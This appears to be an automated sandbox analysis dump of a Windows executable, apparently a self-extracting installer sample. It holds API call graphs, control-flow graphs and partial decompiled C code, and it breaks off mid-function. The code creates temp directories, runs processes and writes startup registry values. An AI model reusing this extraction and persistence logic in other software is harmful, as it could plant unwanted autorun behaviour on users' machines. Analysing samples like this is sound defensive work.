CharPrevA 2716 9757e8 GetFileAttributesA 2715->2716 2717 9757fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 975827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2705 2719->2709 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 975467 49 API calls 2719->2720 2864 976952 2719->2864 2720->2719 2722 976249 2721->2722 2723 976268 2721->2723 2725 9744b9 20 API calls 2722->2725 2724 97597d 34 API calls 2723->2724 2729 97625f 2724->2729 2726 97625a 2725->2726 2728 976285 GetLastError 2726->2728 2727 976ce0 4 API calls 2730 973013 2727->2730 2728->2729 2729->2727 2730->2456 2730->2472 2732 973b2d 2731->2732 2732->2732 2733 973b72 2732->2733 2734 973b53 2732->2734 2934 974fe0 2733->2934 2737 976517 24 API calls 2734->2737 2736 973b70 2738 976298 10 API calls 2736->2738 2739 973b7b 2736->2739 2737->2736 2738->2739 2739->2461 2741 972583 2740->2741 2742 972622 2740->2742 2743 97258b 2741->2743 2744 9725e8 RegOpenKeyExA 2741->2744 2961 9724e0 GetWindowsDirectoryA 2742->2961 2746 9725e3 2743->2746 2748 97259b RegOpenKeyExA 2743->2748 2744->2746 2747 972609 RegQueryInfoKeyA 2744->2747 2746->2467 2749 9725d1 RegCloseKey 2747->2749 2748->2746 2750 9725bc RegQueryValueExA 2748->2750 2749->2746 2750->2749 2752 973bdb 2751->2752 2755 973bec 2751->2755 2754 97468f 7 API calls 2752->2754 2753 973c03 memset 2753->2755 2754->2755 2755->2753 2756 97468f 7 API calls 2755->2756 2757 973d13 2755->2757 2762 973d7b CompareStringA 2755->2762 2763 973fd7 2755->2763 2764 973d26 2755->2764 2765 973fab 2755->2765 2769 973f46 LocalFree 2755->2769 2770 973f1e LocalFree 2755->2770 2774 973cc7 CompareStringA 2755->2774 2785 973e10 2755->2785 2969 971ae8 2755->2969 3010 97202a memset memset RegCreateKeyExA 2755->3010 3036 973fef 2755->3036 2756->2755 2758 9744b9 20 API calls 2757->2758 2758->2764 2760 976ce0 4 API calls 2761 973f60 2760->2761 2761->2470 2762->2755 2762->2763 2763->2764 3060 972267 2763->3060 2764->2760 2768 9744b9 20 API calls 2765->2768 2772 973fbe LocalFree 2768->2772 2769->2764 2770->2755 2770->2763 2772->2764 2774->2755 2775 973f92 2778 9744b9 20 API calls 2775->2778 2776 973e1f GetProcAddress 2777 973f64 2776->2777 2776->2785 2779 9744b9 20 API calls 2777->2779 2780 973fa9 2778->2780 2781 973f75 FreeLibrary 2779->2781 2782 973f7c LocalFree 2780->2782 2781->2782 2783 976285 GetLastError 2782->2783 2784 973f8b 2783->2784 2784->2764 2785->2775 2785->2776 2786 973f40 FreeLibrary 2785->2786 2787 973eff FreeLibrary 2785->2787 3050 976495 2785->3050 2786->2769 2787->2770 2789 97468f 7 API calls 2788->2789 2790 973a55 LocalAlloc 2789->2790 2791 973a8e 2790->2791 2792 973a6c 2790->2792 2794 97468f 7 API calls 2791->2794 2793 9744b9 20 API calls 2792->2793 2796 973a7d 2793->2796 2795 973a98 2794->2795 2797 973ac5 lstrcmpA 2795->2797 2798 973a9c 2795->2798 2799 976285 GetLastError 2796->2799 2801 973b0d LocalFree 2797->2801 2802 973ada 2797->2802 2800 9744b9 20 API calls 2798->2800 2805 972f64 2799->2805 2803 973aad LocalFree 2800->2803 2801->2805 2804 976517 24 API calls 2802->2804 2803->2805 2806 973aec LocalFree 2804->2806 2805->2438 2805->2472 2806->2805 2808 97628f 2807->2808 2808->2472 2810 97468f 7 API calls 2809->2810 2811 97417d LocalAlloc 2810->2811 2812 974195 2811->2812 2813 9741a8 2811->2813 2815 9744b9 20 API calls 2812->2815 2814 97468f 7 API calls 2813->2814 2816 9741b5 2814->2816 2817 9741a6 2815->2817 2818 9741c5 lstrcmpA 2816->2818 2819 9741b9 2816->2819 2817->2472 2818->2819 2820 9741e6 LocalFree 2818->2820 2821 9744b9 20 API calls 2819->2821 2820->2817 2821->2820 2823 97171e _vsnprintf 2822->2823 2824 9762c9 FindResourceA 2823->2824 2826 976353 2824->2826 2827 9762cb LoadResource LockResource 2824->2827 2828 976ce0 4 API calls 2826->2828 2827->2826 2830 9762e0 2827->2830 2829 9751ca 2828->2829 2829->2671 2829->2672 2831 976355 FreeResource 2830->2831 2832 97631b FreeResource 2830->2832 2831->2826 2833 97171e _vsnprintf 2832->2833 2833->2824 2835 97548a 2834->2835 2854 97551a 2834->2854 2894 9753a1 2835->2894 2837 975581 2841 976ce0 4 API calls 2837->2841 2840 975495 2840->2837 2844 9754c2 GetSystemInfo 2840->2844 2845 97550c 2840->2845 2846 97559a 2841->2846 2842 97554d 2842->2837 2849 97597d 34 API calls 2842->2849 2843 97553b CreateDirectoryA 2847 975577 2843->2847 2848 975547 2843->2848 2852 9754da 2844->2852 2850 97658a CharPrevA 2845->2850 2846->2709 2858 972630 GetWindowsDirectoryA 2846->2858 2851 976285 GetLastError 2847->2851 2848->2842 2853 97555c 2849->2853 2850->2854 2855 97557c 2851->2855 2852->2845 2856 97658a CharPrevA 2852->2856 2853->2837 2857 975568 RemoveDirectoryA 2853->2857 2905 9758c8 2854->2905 2855->2837 2856->2845 2857->2837 2859 97266f 2858->2859 2860 97265e 2858->2860 2862 976ce0 4 API calls 2859->2862 2861 9744b9 20 API calls 2860->2861 2861->2859 2863 972687 2862->2863 2863->2696 2863->2710 2865 9769a1 2864->2865 2866 97696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 976989 MulDiv 2866->2867 2867->2865 2869 9759dd GetDiskFreeSpaceA 2868->2869 2870 9759bb 2868->2870 2872 975ba1 memset 2869->2872 2873 975a21 MulDiv 2869->2873 2871 9744b9 20 API calls 2870->2871 2874 9759cc 2871->2874 2875 976285 GetLastError 2872->2875 2873->2872 2876 975a50 GetVolumeInformationA 2873->2876 2877 976285 GetLastError 2874->2877 2878 975bbc GetLastError FormatMessageA 2875->2878 2879 975ab5 SetCurrentDirectoryA 2876->2879 2880 975a6e memset 2876->2880 2881 9759d1 2877->2881 2882 975be3 2878->2882 2889 975acc 2879->2889 2883 976285 GetLastError 2880->2883 2887 976ce0 4 API calls 2881->2887 2884 9744b9 20 API calls 2882->2884 2885 975a89 GetLastError FormatMessageA 2883->2885 2886 975bf5 SetCurrentDirectoryA 2884->2886 2885->2882 2886->2881 2888 975c11 2887->2888 2888->2696 2890 975b0a 2889->2890 2892 975b20 2889->2892 2891 9744b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 97268b 2892->2917 2896 9753bf 2894->2896 2895 97171e _vsnprintf 2895->2896 2896->2895 2897 97658a CharPrevA 2896->2897 2900 975415 GetTempFileNameA 2896->2900 2898 9753fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 97544f CreateDirectoryA 2898->2899 2899->2900 2901 97543a 2899->2901 2900->2901 2902 975429 DeleteFileA CreateDirectoryA 2900->2902 2903 976ce0 4 API calls 2901->2903 2902->2901 2904 975449 2903->2904 2904->2840 2906 9758d8 2905->2906 2906->2906 2907 9758df LocalAlloc 2906->2907 2908 9758f3 2907->2908 2909 975919 2907->2909 2910 9744b9 20 API calls 2908->2910 2912 97658a CharPrevA 2909->2912 2911 975906 2910->2911 2913 976285 GetLastError 2911->2913 2915 975534 2911->2915 2914 975931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 97595b CloseHandle GetFileAttributesA 2914->2916 2915->2842 2915->2843 2916->2911 2918 9726e5 2917->2918 2919 9726b9 2917->2919 2921 97271f 2918->2921 2922 9726ea 2918->2922 2920 97171e _vsnprintf 2919->2920 2924 9726cc 2920->2924 2923 9726e3 2921->2923 2926 97171e _vsnprintf 2921->2926 2925 97171e _vsnprintf 2922->2925 2927 976ce0 4 API calls 2923->2927 2928 9744b9 20 API calls 2924->2928 2929 9726fd 2925->2929 2930 972735 2926->2930 2931 97276d 2927->2931 2928->2923 2932 9744b9 20 API calls 2929->2932 2933 9744b9 20 API calls 2930->2933 2931->2881 2932->2923 2933->2923 2935 97468f 7 API calls 2934->2935 2936 974ff5 FindResourceA LoadResource LockResource 2935->2936 2937 975020 2936->2937 2948 97515f 2936->2948 2938 975057 2937->2938 2939 975029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 974efd 2938->2953 2939->2938 2942 975060 2944 9744b9 20 API calls 2942->2944 2943 97507c 2945 9744b9 20 API calls 2943->2945 2949 975075 2943->2949 2944->2949 2945->2949 2946 975110 FreeResource 2950 97511d 2946->2950 2947 97513a 2947->2948 2951 97514c SendMessageA 2947->2951 2948->2736 2949->2946 2949->2950 2950->2947 2952 9744b9 20 API calls 2950->2952 2951->2948 2952->2947 2954 974f4a 2953->2954 2955 974980 25 API calls 2954->2955 2960 974fa1 2954->2960 2958 974f67 2955->2958 2956 976ce0 4 API calls 2957 974fc6 2956->2957 2957->2942 2957->2943 2959 974b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 972510 2961->2962 2963 97255b 2961->2963 2964 97658a CharPrevA 2962->2964 2965 976ce0 4 API calls 2963->2965 2966 972522 WritePrivateProfileStringA _lopen 2964->2966 2967 972569 2965->2967 2966->2963 2968 972548 _llseek _lclose 2966->2968 2967->2746 2968->2963 2970 971b25 2969->2970 3074 971a84 2970->3074 2972 971b57 2973 97658a CharPrevA 2972->2973 2975 971b8c 2972->2975 2973->2975 2974 9766c8 2 API calls 2976 971bd1 2974->2976 2975->2974 2977 971d73 2976->2977 2978 971bd9 CompareStringA 2976->2978 2980 9766c8 2 API calls 2977->2980 2978->2977 2979 971bf7 GetFileAttributesA 2978->2979 2981 971d53 2979->2981 2982 971c0d 2979->2982 2983 971d7d 2980->2983 2984 971d64 2981->2984 2982->2981 2989 971a84 2 API calls 2982->2989 2985 971d81 CompareStringA 2983->2985 2986 971df8 LocalAlloc 2983->2986 2987 9744b9 20 API calls 2984->2987 2985->2986 2996 971d9b 2985->2996 2986->2984 2988 971e0b GetFileAttributesA 2986->2988 2990 971d6c 2987->2990 2991 971e1d 2988->2991 3009 971e45 2988->3009 2992 971c31 2989->2992 2995 976ce0 4 API calls 2990->2995 2991->3009 2993 971c50 LocalAlloc 2992->2993 3000 971a84 2 API calls 2992->3000 2993->2984 2994 971c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2994 3003 971cf8 2994->3003 3007 971cc2 2994->3007 2999 971ea1 2995->2999 2996->2996 3001 971dbe LocalAlloc 2996->3001 2999->2755 3000->2993 3001->2984 3002 971de1 3001->3002 3004 97171e _vsnprintf 3002->3004 3005 971d23 3003->3005 3006 971d09 GetShortPathNameA 3003->3006 3004->3007 3008 97171e _vsnprintf 3005->3008 3006->3005 3007->2990 3008->3007 3080 972aac 3009->3080 3011 972256 3010->3011 3012 97209a 3010->3012 3013 976ce0 4 API calls 3011->3013 3015 97171e _vsnprintf 3012->3015 3017 9720dc 3012->3017 3014 972263 3013->3014 3014->2755 3016 9720af RegQueryValueExA 3015->3016 3016->3012 3016->3017 3018 9720e4 RegCloseKey 3017->3018 3019 9720fb GetSystemDirectoryA 3017->3019 3018->3011 3020 97658a CharPrevA 3019->3020 3021 97211b LoadLibraryA 3020->3021 3022 97212e GetProcAddress FreeLibrary 3021->3022 3023 972179 GetModuleFileNameA 3021->3023 3022->3023 3024 97214e GetSystemDirectoryA 3022->3024 3025 9721de RegCloseKey 3023->3025 3028 972177 LocalAlloc 3023->3028 3026 972165 3024->3026 3024->3028 3025->3011 3027 97658a CharPrevA 3026->3027 3027->3028 3030 9721cd 3028->3030 3031 9721ec 3028->3031 3032 9744b9 20 API calls 3030->3032 3033 97171e _vsnprintf 3031->3033 3032->3025 3034 972218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3011 3037 974016 CreateProcessA 3036->3037 3049 974106 3036->3049 3038 9740c4 3037->3038 3039 974041 WaitForSingleObject GetExitCodeProcess 3037->3039 3041 976285 GetLastError 3038->3041 3042 974070 3039->3042 3040 976ce0 4 API calls 3043 974117 3040->3043 3044 9740c9 GetLastError FormatMessageA 3041->3044 3107 97411b 3042->3107 3043->2755 3047 9744b9 20 API calls 3044->3047 3046 974096 CloseHandle CloseHandle 3048 9740ba 3046->3048 3046->3049 3047->3049 3048->3049 3049->3040 3051 9764c2 3050->3051 3052 97658a CharPrevA 3051->3052 3053 9764d8 GetFileAttributesA 3052->3053 3054 976501 LoadLibraryA 3053->3054 3055 9764ea 3053->3055 3057 976508 3054->3057 3055->3054 3056 9764ee LoadLibraryExA 3055->3056 3056->3057 3058 976ce0 4 API calls 3057->3058 3059 976513 3058->3059 3059->2785 3061 972289 RegOpenKeyExA 3060->3061 3063 972381 3060->3063 3061->3063 3064 9722b1 RegQueryValueExA 3061->3064 3062 976ce0 4 API calls 3065 97238c 3062->3065 3063->3062 3066 9722e6 memset GetSystemDirectoryA 3064->3066 3067 972374 RegCloseKey 3064->3067 3065->2764 3068 972321 3066->3068 3069 97230f 3066->3069 3067->3063 3071 97171e _vsnprintf 3068->3071 3070 97658a CharPrevA 3069->3070 3070->3068 3072 97233f RegSetValueExA 3071->3072 3072->3067 3076 971a9a 3074->3076 3077 971aaf 3076->3077 3078 971aba 3076->3078 3093 97667f 3076->3093 3077->3078 3079 97667f 2 API calls 3077->3079 3078->2972 3079->3077 3081 972ad4 GetModuleFileNameA 3080->3081 3082 972be6 3080->3082 3092 972b02 3081->3092 3083 976ce0 4 API calls 3082->3083 3085 972bf5 3083->3085 3084 972af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 972b11 CharNextA CharUpperA 3089 972b8d CharUpperA 3086->3089 3086->3092 3087 972bca CharNextA 3088 972bd3 CharNextA 3087->3088 3088->3092 3089->3092 3091 972b43 CharPrevA 3091->3092 3092->3082 3092->3084 3092->3086 3092->3087 3092->3088 3092->3091 3098 9765e8 3092->3098 3095 976689 3093->3095 3094 9766a5 3094->3076 3095->3094 3096 976648 IsDBCSLeadByte 3095->3096 3097 976697 CharNextA 3095->3097 3096->3095 3097->3095 3099 9765f4 3098->3099 3099->3099 3100 9765fb CharPrevA 3099->3100 3101 976611 CharPrevA 3100->3101 3102 97661e 3101->3102 3103 97660b 3101->3103 3104 97663d 3102->3104 3105 976627 CharPrevA 3102->3105 3106 976634 CharNextA 3102->3106 3103->3101 3103->3102 3104->3092 3105->3104 3105->3106 3106->3104 3108 974132 3107->3108 3109 97412a 3107->3109 3111 971ea7 3108->3111 3109->3046 3112 971eba 3111->3112 3113 971ed3 3111->3113 3114 97256d 15 API calls 3112->3114 3113->3109 3114->3113 3116 972026 3115->3116 3117 971ff0 RegOpenKeyExA 3115->3117 3116->2480 3117->3116 3118 97200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3266 9719e0 3267 971a24 GetDesktopWindow 3266->3267 3268 971a03 3266->3268 3269 9743d0 11 API calls 3267->3269 3270 971a20 3268->3270 3272 971a16 EndDialog 3268->3272 3271 971a33 LoadStringA SetDlgItemTextA MessageBeep 3269->3271 3273 976ce0 4 API calls 3270->3273 3271->3270 3272->3270 3274 971a7e 3273->3274 3275 976a20 __getmainargs 3276 976bef _XcptFilter

                                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                                              callgraph 0 Function_00976495 9 Function_00971781 0->9 16 Function_0097658A 0->16 57 Function_00976CE0 0->57 1 Function_00976793 2 Function_00971F90 22 Function_009744B9 2->22 23 Function_00971EA7 2->23 2->57 3 Function_00972390 3->3 13 Function_00971680 3->13 3->16 19 Function_009716B3 3->19 3->57 4 Function_00975C9E 4->13 4->16 4->22 44 Function_009766C8 4->44 56 Function_009731E0 4->56 4->57 70 Function_00975C17 4->70 95 Function_00976E2A 4->95 107 Function_0097667F 4->107 5 Function_00974E99 5->13 6 Function_00976298 6->57 76 Function_0097171E 6->76 7 Function_00976285 8 Function_00971A84 8->107 10 Function_00976380 11 Function_00973680 12 Function_00974980 12->22 109 Function_0097487A 12->109 13->9 14 Function_0097468F 15 Function_0097268B 15->22 15->57 15->76 16->19 17 Function_00972A89 18 Function_009752B6 18->3 18->9 54 Function_00971FE1 18->54 18->57 69 Function_009765E8 18->69 19->9 20 Function_009769B0 21 Function_00976FBE 20->21 62 Function_009771EF 20->62 83 Function_00977000 20->83 106 Function_00976C70 20->106 97 Function_00976F54 21->97 22->13 42 Function_009767C9 22->42 22->57 74 Function_0097681F 22->74 22->76 117 Function_0097256D 23->117 24 Function_00976FA5 102 Function_0097724D 24->102 25 Function_009718A3 25->57 65 Function_009717EE 25->65 26 Function_00973BA2 26->0 26->7 26->9 26->14 26->22 26->57 61 Function_00973FEF 26->61 67 Function_00971AE8 26->67 94 Function_0097202A 26->94 111 Function_00972267 26->111 27 Function_009772A2 28 Function_009753A1 28->13 28->16 28->57 28->76 29 Function_00976FA1 30 Function_00974CA0 31 Function_009755A0 31->7 31->9 31->14 31->16 31->22 31->57 71 Function_00976517 31->71 87 Function_00972630 31->87 98 Function_00976952 31->98 108 Function_0097597D 31->108 110 Function_00975467 31->110 32 Function_009766AE 33 Function_00972AAC 33->13 45 Function_009717C8 33->45 33->57 33->69 34 Function_00972CAA 34->3 34->4 34->14 34->22 34->25 34->57 64 Function_009736EE 34->64 34->71 35 Function_00974CD0 35->5 35->12 35->57 59 Function_009747E0 35->59 80 Function_00974702 35->80 86 Function_00974C37 35->86 113 Function_00974B60 35->113 118 Function_0097476D 35->118 36 Function_00974AD0 36->11 37 Function_009743D0 37->57 38 Function_00974CC0 39 Function_00974BC0 40 Function_009730C0 41 Function_009763C0 41->9 41->16 41->57 42->1 43 Function_009758C8 43->7 43->13 43->16 43->22 103 Function_00976648 44->103 46 Function_00976CF0 47 Function_009734F0 47->11 47->22 47->37 48 Function_00976EF0 49 Function_009770FE 50 Function_00974EFD 50->12 50->57 50->113 51 Function_00972BFB 51->2 51->18 51->34 77 Function_00972F1D 51->77 52 Function_009766F9 53 Function_009751E5 53->7 53->14 53->22 55 Function_00974FE0 55->14 55->22 55->50 57->46 58 Function_009724E0 58->16 58->57 59->13 59->22 60 Function_009719E0 60->37 60->57 61->7 61->22 61->57 78 Function_0097411B 61->78 63 Function_00976BEF 64->17 64->22 64->42 64->57 68 Function_009728E8 64->68 64->74 65->57 66 Function_009770EB 67->8 67->9 67->13 67->16 67->19 67->22 67->33 67->44 67->57 67->76 68->17 104 Function_00972773 68->104 71->22 72 Function_00977010 73 Function_00973210 73->16 73->22 73->37 73->43 91 Function_00974224 73->91 73->108 74->52 74->57 75 Function_0097621E 75->7 75->22 75->57 75->108 77->7 77->16 77->22 77->26 77->31 77->53 77->57 77->75 88 Function_00973A3F 77->88 90 Function_00973B26 77->90 112 Function_00975164 77->112 77->117 119 Function_00974169 77->119 78->23 79 Function_00976C03 79->102 80->13 80->19 81 Function_00973100 81->37 82 Function_00974200 84 Function_0097490C 85 Function_00977208 87->22 87->57 88->7 88->14 88->22 88->71 89 Function_00976C3F 90->6 90->55 90->71 91->13 91->22 92 Function_00977120 93 Function_00976A20 94->16 94->22 94->57 94->76 95->46 96 Function_00977155 97->85 97->102 99 Function_00974A50 100 Function_00973450 100->37 101 Function_00976F40 104->9 104->13 104->16 104->57 105 Function_00977270 107->103 108->7 108->15 108->22 108->57 109->84 110->7 110->9 110->13 110->16 110->28 110->43 110->57 110->108 111->16 111->57 111->76 112->6 112->14 112->22 114 Function_00976A60 114->51 114->85 114->89 114->96 114->102 115 Function_00977060 114->115 115->72 115->92 116 Function_00976760 117->58 118->32 118->71 119->14 119->22

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 36 973ba2-973bd9 37 973bfd-973bff 36->37 38 973bdb-973bee call 97468f 36->38 39 973c03-973c28 memset 37->39 45 973bf4-973bf7 38->45 46 973d13-973d30 call 9744b9 38->46 41 973d35-973d48 call 971781 39->41 42 973c2e-973c40 call 97468f 39->42 48 973d4d-973d52 41->48 42->46 53 973c46-973c49 42->53 45->37 45->46 58 973f4d 46->58 51 973d54-973d6c call 97468f 48->51 52 973d9e-973db6 call 971ae8 48->52 51->46 65 973d6e-973d75 51->65 52->58 69 973dbc-973dc2 52->69 53->46 56 973c4f-973c56 53->56 61 973c60-973c65 56->61 62 973c58-973c5e 56->62 59 973f4f-973f63 call 976ce0 58->59 67 973c67-973c6d 61->67 68 973c75-973c7c 61->68 66 973c6e-973c73 62->66 71 973d7b-973d98 CompareStringA 65->71 72 973fda-973fe1 65->72 73 973c87-973c89 66->73 67->66 68->73 76 973c7e-973c82 68->76 74 973de6-973de8 69->74 75 973dc4-973dce 69->75 71->52 71->72 79 973fe3 call 972267 72->79 80 973fe8-973fea 72->80 73->48 82 973c8f-973c98 73->82 77 973dee-973df5 74->77 78 973f0b-973f15 call 973fef 74->78 75->74 81 973dd0-973dd7 75->81 76->73 83 973fab-973fd2 call 9744b9 LocalFree 77->83 84 973dfb-973dfd 77->84 92 973f1a-973f1c 78->92 79->80 80->59 81->74 87 973dd9-973ddb 81->87 88 973cf1-973cf3 82->88 89 973c9a-973c9c 82->89 83->58 84->78 90 973e03-973e0a 84->90 87->77 93 973ddd-973de1 call 97202a 87->93 88->52 91 973cf9-973d11 call 97468f 88->91 95 973ca5-973ca7 89->95 96 973c9e-973ca3 89->96 90->78 99 973e10-973e19 call 976495 90->99 91->46 91->48 101 973f46-973f47 LocalFree 92->101 102 973f1e-973f2d LocalFree 92->102 93->74 95->58 98 973cad 95->98 97 973cb2-973cc5 call 97468f 96->97 97->46 112 973cc7-973ce8 CompareStringA 97->112 98->97 113 973f92-973fa9 call 9744b9 99->113 114 973e1f-973e36 GetProcAddress 99->114 101->58 108 973fd7-973fd9 102->108 109 973f33-973f3b 102->109 108->72 109->39 112->88 115 973cea-973ced 112->115 126 973f7c-973f90 LocalFree call 976285 113->126 116 973f64-973f76 call 9744b9 FreeLibrary 114->116 117 973e3c-973e80 114->117 115->88 116->126 120 973e82-973e87 117->120 121 973e8b-973e94 117->121 120->121 124 973e96-973e9b 121->124 125 973e9f-973ea2 121->125 124->125 128 973ea4-973ea9 125->128 129 973ead-973eb6 125->129 126->58 128->129 131 973ec1-973ec3 129->131 132 973eb8-973ebd 129->132 133 973ec5-973eca 131->133 134 973ece-973eec 131->134 132->131 133->134 137 973ef5-973efd 134->137 138 973eee-973ef3 134->138 139 973f40 FreeLibrary 137->139 140 973eff-973f09 FreeLibrary 137->140 138->137 139->101 140->102
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00973BA2() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v280;
                                                                                                                                                                                                                                              				short _v300;
                                                                                                                                                                                                                                              				intOrPtr _v304;
                                                                                                                                                                                                                                              				void _v348;
                                                                                                                                                                                                                                              				char _v352;
                                                                                                                                                                                                                                              				intOrPtr _v356;
                                                                                                                                                                                                                                              				signed int _v360;
                                                                                                                                                                                                                                              				short _v364;
                                                                                                                                                                                                                                              				char* _v368;
                                                                                                                                                                                                                                              				intOrPtr _v372;
                                                                                                                                                                                                                                              				void* _v376;
                                                                                                                                                                                                                                              				intOrPtr _v380;
                                                                                                                                                                                                                                              				char _v384;
                                                                                                                                                                                                                                              				signed int _v388;
                                                                                                                                                                                                                                              				intOrPtr _v392;
                                                                                                                                                                                                                                              				signed int _v396;
                                                                                                                                                                                                                                              				signed int _v400;
                                                                                                                                                                                                                                              				signed int _v404;
                                                                                                                                                                                                                                              				void* _v408;
                                                                                                                                                                                                                                              				void* _v424;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                                                                              				void* _t77;
                                                                                                                                                                                                                                              				signed int _t79;
                                                                                                                                                                                                                                              				short _t96;
                                                                                                                                                                                                                                              				signed int _t97;
                                                                                                                                                                                                                                              				intOrPtr _t98;
                                                                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                                                                              				signed int _t104;
                                                                                                                                                                                                                                              				signed int _t108;
                                                                                                                                                                                                                                              				int _t112;
                                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                                              				signed char _t118;
                                                                                                                                                                                                                                              				void* _t125;
                                                                                                                                                                                                                                              				signed int _t127;
                                                                                                                                                                                                                                              				void* _t128;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                              				void* _t130;
                                                                                                                                                                                                                                              				short _t137;
                                                                                                                                                                                                                                              				char* _t140;
                                                                                                                                                                                                                                              				signed char _t144;
                                                                                                                                                                                                                                              				signed char _t145;
                                                                                                                                                                                                                                              				signed int _t149;
                                                                                                                                                                                                                                              				void* _t150;
                                                                                                                                                                                                                                              				void* _t151;
                                                                                                                                                                                                                                              				signed int _t153;
                                                                                                                                                                                                                                              				void* _t155;
                                                                                                                                                                                                                                              				void* _t156;
                                                                                                                                                                                                                                              				signed int _t157;
                                                                                                                                                                                                                                              				signed int _t162;
                                                                                                                                                                                                                                              				signed int _t164;
                                                                                                                                                                                                                                              				void* _t165;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                              				_t69 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                              				_t153 = 0;
                                                                                                                                                                                                                                              				 *0x979124 =  *0x979124 & 0;
                                                                                                                                                                                                                                              				_t149 = 0;
                                                                                                                                                                                                                                              				_v388 = 0;
                                                                                                                                                                                                                                              				_v384 = 0;
                                                                                                                                                                                                                                              				_t165 =  *0x978a28 - _t153; // 0x0
                                                                                                                                                                                                                                              				if(_t165 != 0) {
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t127 = 0;
                                                                                                                                                                                                                                              					_v392 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                              						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                              						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                              						_v348 = 0x44;
                                                                                                                                                                                                                                              						if( *0x978c42 != 0) {
                                                                                                                                                                                                                                              							goto L26;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t146 =  &_v396;
                                                                                                                                                                                                                                              						_t115 = E0097468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                              						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                                                              							_t146 = 0x4b1;
                                                                                                                                                                                                                                              							E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              							 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              							goto L62;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(_v396 != 1) {
                                                                                                                                                                                                                                              								__eflags = _v396 - 2;
                                                                                                                                                                                                                                              								if(_v396 != 2) {
                                                                                                                                                                                                                                              									_t137 = 3;
                                                                                                                                                                                                                                              									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                              									if(_v396 == _t137) {
                                                                                                                                                                                                                                              										_v304 = 1;
                                                                                                                                                                                                                                              										_v300 = _t137;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L14;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_push(6);
                                                                                                                                                                                                                                              								_v304 = 1;
                                                                                                                                                                                                                                              								_pop(0);
                                                                                                                                                                                                                                              								goto L11;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_v304 = 1;
                                                                                                                                                                                                                                              								L11:
                                                                                                                                                                                                                                              								_v300 = 0;
                                                                                                                                                                                                                                              								L14:
                                                                                                                                                                                                                                              								if(_t127 != 0) {
                                                                                                                                                                                                                                              									L27:
                                                                                                                                                                                                                                              									_t155 = 1;
                                                                                                                                                                                                                                              									__eflags = _t127 - 1;
                                                                                                                                                                                                                                              									if(_t127 != 1) {
                                                                                                                                                                                                                                              										L31:
                                                                                                                                                                                                                                              										_t132 =  &_v280;
                                                                                                                                                                                                                                              										_t76 = E00971AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                              										__eflags = _t76;
                                                                                                                                                                                                                                              										if(_t76 == 0) {
                                                                                                                                                                                                                                              											L62:
                                                                                                                                                                                                                                              											_t77 = 0;
                                                                                                                                                                                                                                              											L63:
                                                                                                                                                                                                                                              											_pop(_t150);
                                                                                                                                                                                                                                              											_pop(_t156);
                                                                                                                                                                                                                                              											_pop(_t128);
                                                                                                                                                                                                                                              											return E00976CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t157 = _v404;
                                                                                                                                                                                                                                              										__eflags = _t149;
                                                                                                                                                                                                                                              										if(_t149 != 0) {
                                                                                                                                                                                                                                              											L37:
                                                                                                                                                                                                                                              											__eflags = _t157;
                                                                                                                                                                                                                                              											if(_t157 == 0) {
                                                                                                                                                                                                                                              												L57:
                                                                                                                                                                                                                                              												_t151 = _v408;
                                                                                                                                                                                                                                              												_t146 =  &_v352;
                                                                                                                                                                                                                                              												_t130 = _t151; // executed
